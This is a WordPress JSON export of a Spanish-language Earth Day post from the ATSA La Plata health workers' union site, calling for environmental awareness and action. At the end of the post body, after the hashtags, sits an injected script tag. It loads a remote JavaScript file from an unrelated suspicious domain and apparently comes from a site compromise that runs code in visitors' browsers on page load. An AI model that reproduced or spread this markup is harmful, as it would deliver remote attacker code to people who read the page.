{"id":18355,"date":"2025-04-22T00:00:00","date_gmt":"2025-04-22T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18355"},"modified":"2026-02-02T17:14:30","modified_gmt":"2026-02-02T20:14:30","slug":"dia-internacional-de-la-tierra","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/dia-internacional-de-la-tierra\/","title":{"rendered":"D\u00eda internacional de la tierra"},"content":{"rendered":"\n<p>Cada 22 de abril, se conmemora el \u201cD\u00eda Internacional de la Tierra\u201d, una fecha que se estableci\u00f3 en 1970 como una respuesta ciudadana ante la creciente preocupaci\u00f3n por <a><\/a>los efectos nocivos del desarrollo industrial, la contaminaci\u00f3n ambiental y la p\u00e9rdida acelerada de la biodiversidad.<\/p>\n\n\n\n<p>M\u00e1s de cinco d\u00e9cadas despu\u00e9s, el panorama lejos de haber mejorado, se agrav\u00f3 de manera alarmante, por lo que esta jornada ya no puede ser vista s\u00f3lo como una efem\u00e9ride ambiental, sino que debe asumirse como una llamada urgente a la conciencia colectiva y a la acci\u00f3n.<\/p>\n\n\n\n<p>El D\u00eda de la Tierra debe servir como un espacio de reflexi\u00f3n cr\u00edtica sobre nuestro papel dentro del entramado de la vida. Somos la \u00fanica especie capaz de alterar a gran escala los equilibrios naturales, pero tambi\u00e9n somos la \u00fanica con la capacidad -y la responsabilidad moral- de revertir el da\u00f1o causado.<img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83c\udf0e\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/tc0\/1\/16\/1f30e.png\"><img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\u270a\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t5f\/1\/16\/270a.png\"><\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/hashtag\/sanidadatsalaplata?__eep__=6&amp;__cft__[0]=AZVdhuJIkqk_2IW_oVWS3ZlN-8_U5lerAcci5tUmKlf9fs7RvWKEom5WC6vnhrhZ_Q4daF7JkhdShYLgivsvju-3mpf9gqN2nBhPy4X8AAKvQ6FH94eFKzbHVqGN1DT5bKmiRq3mbTpk86N7raYlbwtW&amp;__tn__=*NK-R\" target=\"_blank\" rel=\"noreferrer noopener\">#SanidadAtsaLaPlata<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/siemprejuntoavos?__eep__=6&amp;__cft__[0]=AZVdhuJIkqk_2IW_oVWS3ZlN-8_U5lerAcci5tUmKlf9fs7RvWKEom5WC6vnhrhZ_Q4daF7JkhdShYLgivsvju-3mpf9gqN2nBhPy4X8AAKvQ6FH94eFKzbHVqGN1DT5bKmiRq3mbTpk86N7raYlbwtW&amp;__tn__=*NK-R\" target=\"_blank\" rel=\"noreferrer noopener\">#SiempreJuntoAVos<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/diadelatierra?__eep__=6&amp;__cft__[0]=AZVdhuJIkqk_2IW_oVWS3ZlN-8_U5lerAcci5tUmKlf9fs7RvWKEom5WC6vnhrhZ_Q4daF7JkhdShYLgivsvju-3mpf9gqN2nBhPy4X8AAKvQ6FH94eFKzbHVqGN1DT5bKmiRq3mbTpk86N7raYlbwtW&amp;__tn__=*NK-R\" target=\"_blank\" rel=\"noreferrer noopener\">#DiaDeLaTierra<\/a><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Cada 22 de abril, se conmemora el \u201cD\u00eda Internacional de la Tierra\u201d, una fecha que&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18356,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[98,147,97,85,148],"tags":[],"class_list":["post-18355","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18355"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18355\/revisions"}],"predecessor-version":[{"id":20834,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18355\/revisions\/20834"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18356"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18355"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}